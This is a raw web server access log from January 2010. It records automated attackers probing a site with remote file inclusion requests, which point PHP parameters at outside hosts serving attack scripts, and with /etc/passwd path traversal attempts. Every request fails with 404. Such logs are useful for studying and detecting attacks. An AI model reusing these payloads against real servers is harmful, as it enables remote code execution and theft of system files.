77.79.246.80 - - [31/Jan/2010:22:56:42 -0800] "GET /logs/access.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.6.218.57 - - [31/Jan/2010:22:56:52 -0800] "GET /logs/access_090803.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.43.102.37 - - [31/Jan/2010:22:58:20 -0800] "GET //write_comment_update.php?board_skin_path=hhttp://www.cmhaniagara.ca/video/pandegaid.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
109.123.64.129 - - [31/Jan/2010:22:58:53 -0800] "GET /bbs//delete_all.php?board_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
109.123.64.129 - - [31/Jan/2010:22:58:53 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
109.123.64.129 - - [31/Jan/2010:22:58:53 -0800] "GET /logs/access_100118.log//bbs//delete_all.php?board_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.43.102.37 - - [31/Jan/2010:22:59:05 -0800] "GET //write_comment_update.php?board_skin_path=http://www.cmhaniagara.ca/video/pandegaid.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
109.123.64.129 - - [31/Jan/2010:23:00:01 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
109.123.64.129 - - [31/Jan/2010:23:00:01 -0800] "GET /logs/access_100118.log//bbs//delete_all.php?board_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
109.123.64.129 - - [31/Jan/2010:23:00:01 -0800] "GET /bbs//delete_all.php?board_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.93.149.176 - - [31/Jan/2010:23:00:19 -0800] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
208.93.149.176 - - [31/Jan/2010:23:00:19 -0800] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
208.93.149.176 - - [31/Jan/2010:23:00:19 -0800] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
208.93.149.176 - - [31/Jan/2010:23:00:19 -0800] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:23:00:33 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:23:00:33 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:23:00:34 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:23:00:34 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:23:00:34 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:23:00:34 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [31/Jan/2010:23:00:34 -0800] "GET /logs/access.log%20%20//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.131 - - [31/Jan/2010:23:00:34 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.131 - - [31/Jan/2010:23:00:34 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.141.91.138 - - [31/Jan/2010:23:00:34 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:23:00:36 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:23:00:36 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [31/Jan/2010:23:01:03 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.131 - - [31/Jan/2010:23:01:03 -0800] "GET /logs/access.log%20%20//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.131 - - [31/Jan/2010:23:01:03 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.141.91.138 - - [31/Jan/2010:23:01:19 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:23:01:19 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:23:01:19 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.28 - - [31/Jan/2010:23:02:00 -0800] "GET /labia23portugues/index.htm HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {E84FCE32-5FBB-4B5E-B526-E0A19A74662F}; SV1; .NET CLR 1.0.3705; Media Center PC 2.8)" "www.galf.org"
123.100.248.85 - - [31/Jan/2010:23:02:07 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.umikaze-town.jp/templates_c/category.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
123.100.248.85 - - [31/Jan/2010:23:02:07 -0800] "GET /delete_all.php?board_skin_path=http://www.umikaze-town.jp/templates_c/category.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
123.100.248.85 - - [31/Jan/2010:23:02:08 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.umikaze-town.jp/templates_c/category.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
209.172.33.230 - - [31/Jan/2010:23:02:50 -0800] "GET /logs//delete_all.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [31/Jan/2010:23:02:50 -0800] "GET /delete_all.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [31/Jan/2010:23:02:50 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.244.25.227 - - [31/Jan/2010:23:03:12 -0800] "GET /logs/access_090921.log/start_lobby.php?CONFIG[MWCHAT_Libs]http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
87.244.25.227 - - [31/Jan/2010:23:03:12 -0800] "GET /start_lobby.php?CONFIG[MWCHAT_Libs]http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
87.244.25.227 - - [31/Jan/2010:23:03:13 -0800] "GET /logs/start_lobby.php?CONFIG[MWCHAT_Libs]http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
58.150.99.131 - - [31/Jan/2010:23:03:23 -0800] "GET /logs/access.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.131 - - [31/Jan/2010:23:03:39 -0800] "GET /logs/access.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.158.155 - - [31/Jan/2010:23:06:40 -0800] "GET /logs/access_090907.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://eco-smart.co.kr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [31/Jan/2010:23:06:40 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://eco-smart.co.kr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [31/Jan/2010:23:06:40 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://eco-smart.co.kr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [31/Jan/2010:23:06:42 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://eco-smart.co.kr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [31/Jan/2010:23:06:42 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://eco-smart.co.kr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [31/Jan/2010:23:06:42 -0800] "GET /logs/access_090907.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://eco-smart.co.kr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [31/Jan/2010:23:06:54 -0800] "GET /logs/access_091221.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://eco-smart.co.kr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [31/Jan/2010:23:06:55 -0800] "GET /logs/access_091221.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://eco-smart.co.kr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.100.248.85 - - [31/Jan/2010:23:07:21 -0800] "GET /logs/access.log///write_comment_update.php?board_skin_path=hhttp://www.umikaze-town.jp/templates_c/category.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
123.100.248.85 - - [31/Jan/2010:23:07:22 -0800] "GET //write_comment_update.php?board_skin_path=hhttp://www.umikaze-town.jp/templates_c/category.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
123.100.248.85 - - [31/Jan/2010:23:07:23 -0800] "GET /logs///write_comment_update.php?board_skin_path=hhttp://www.umikaze-town.jp/templates_c/category.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
123.100.248.85 - - [31/Jan/2010:23:08:13 -0800] "GET /logs/access.log///write_comment_update.php?board_skin_path=http://www.umikaze-town.jp/templates_c/category.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
123.100.248.85 - - [31/Jan/2010:23:08:14 -0800] "GET //write_comment_update.php?board_skin_path=http://www.umikaze-town.jp/templates_c/category.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
123.100.248.85 - - [31/Jan/2010:23:08:15 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://www.umikaze-town.jp/templates_c/category.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
189.6.218.57 - - [31/Jan/2010:23:09:35 -0800] "GET /logs/access_100111.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.56.210 - - [31/Jan/2010:23:09:35 -0800] "GET /delete_all.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.56.210 - - [31/Jan/2010:23:09:35 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.56.210 - - [31/Jan/2010:23:09:35 -0800] "GET /logs//delete_all.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [31/Jan/2010:23:10:24 -0800] "GET /logs/access.log///write_comment_update.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [31/Jan/2010:23:10:24 -0800] "GET //write_comment_update.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [31/Jan/2010:23:10:24 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.244.25.227 - - [31/Jan/2010:23:10:36 -0800] "GET /logs/access_091228.log/start_lobby.php?CONFIG[MWCHAT_Libs]http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
123.100.248.85 - - [31/Jan/2010:23:13:34 -0800] "GET /logs/access.log///write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.100.248.85 - - [31/Jan/2010:23:13:34 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.100.248.85 - - [31/Jan/2010:23:13:36 -0800] "GET //write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.56.210 - - [31/Jan/2010:23:13:41 -0800] "GET //write_comment_update.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.56.210 - - [31/Jan/2010:23:13:41 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.56.210 - - [31/Jan/2010:23:13:42 -0800] "GET /logs/access.log///write_comment_update.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.100.248.85 - - [31/Jan/2010:23:13:54 -0800] "GET /delete_all.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.100.248.85 - - [31/Jan/2010:23:13:54 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.100.248.85 - - [31/Jan/2010:23:13:55 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.244.25.227 - - [31/Jan/2010:23:16:59 -0800] "GET /logs/access.log/spaw_control.class.php?spaw_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
87.244.25.227 - - [31/Jan/2010:23:17:00 -0800] "GET /spaw_control.class.php?spaw_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
87.244.25.227 - - [31/Jan/2010:23:17:00 -0800] "GET /logs/spaw_control.class.php?spaw_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:23:17:24 -0800] "GET /logs/access_090720.log%20%20/convert/mvcw.php?vwar_root=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:23:17:24 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:23:17:24 -0800] "GET /convert/mvcw.php?vwar_root=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:23:17:24 -0800] "GET /logs/access_090914.log%20%20/convert/mvcw.php?vwar_root=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.244.25.227 - - [31/Jan/2010:23:20:18 -0800] "GET /logs/access_090831.log/mvcw.php?step=1&vwar_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
87.244.25.227 - - [31/Jan/2010:23:20:18 -0800] "GET /mvcw.php?step=1&vwar_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
87.244.25.227 - - [31/Jan/2010:23:20:18 -0800] "GET /logs/mvcw.php?step=1&vwar_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
87.244.25.227 - - [31/Jan/2010:23:20:57 -0800] "GET /logs/access_100125.log/spaw_control.class.php?spaw_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
87.244.25.227 - - [31/Jan/2010:23:24:46 -0800] "GET /logs/start_lobby.php?CONFIG[MWCHAT_Libs]http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
87.244.25.227 - - [31/Jan/2010:23:24:46 -0800] "GET /start_lobby.php?CONFIG[MWCHAT_Libs]http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
87.244.25.227 - - [31/Jan/2010:23:25:00 -0800] "GET /logs/access_090921.log/mvcw.php?step=1&vwar_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:23:28:21 -0800] "GET /main.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "galf.org"
194.110.160.78 - - [31/Jan/2010:23:28:21 -0800] "GET /main.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "galf.org"
212.150.147.153 - - [31/Jan/2010:23:29:33 -0800] "GET /logs//gnuboard4//bbs//delete_all.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.150.147.153 - - [31/Jan/2010:23:29:33 -0800] "GET /logs/access.log//gnuboard4//bbs//delete_all.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.150.147.153 - - [31/Jan/2010:23:29:34 -0800] "GET /gnuboard4//bbs//delete_all.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [31/Jan/2010:23:30:04 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [31/Jan/2010:23:30:04 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [31/Jan/2010:23:30:04 -0800] "GET /logs/access_090803.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [31/Jan/2010:23:30:50 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [31/Jan/2010:23:30:50 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [31/Jan/2010:23:30:50 -0800] "GET /logs/access_090803.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [31/Jan/2010:23:30:55 -0800] "GET /index0.php?show=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [31/Jan/2010:23:30:55 -0800] "GET /logs/access_091221.log%20%20/index0.php?show=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [31/Jan/2010:23:30:55 -0800] "GET /logs/index0.php?show=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [31/Jan/2010:23:31:03 -0800] "GET /logs/index0.php?show=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [31/Jan/2010:23:31:03 -0800] "GET /index0.php?show=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [31/Jan/2010:23:31:03 -0800] "GET /logs/access_091221.log%20%20/index0.php?show=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:23:32:22 -0800] "GET /main.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:23:32:22 -0800] "GET /main.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:23:32:27 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:23:32:27 -0800] "GET /logs/access_090803.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:23:32:27 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:23:35:07 -0800] "GET /index0.php?show=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:23:35:07 -0800] "GET /logs/index0.php?show=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:23:35:07 -0800] "GET /logs/access_091221.log/index0.php?show=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:23:35:14 -0800] "GET /logs/access_091221.log%20%20/index0.php?show=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:23:35:14 -0800] "GET /index0.php?show=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:23:35:14 -0800] "GET /logs/index0.php?show=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.48.18.241 - - [31/Jan/2010:23:35:18 -0800] "GET /logs/access_090720.log//modules/Forums/admin/admin_users=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [31/Jan/2010:23:38:36 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.79.246.80 - - [31/Jan/2010:23:38:36 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.79.246.80 - - [31/Jan/2010:23:38:36 -0800] "GET /logs/access.log%20%20//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.79.246.80 - - [31/Jan/2010:23:38:38 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.79.246.80 - - [31/Jan/2010:23:38:38 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.79.246.80 - - [31/Jan/2010:23:38:38 -0800] "GET /logs/access.log%20%20//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
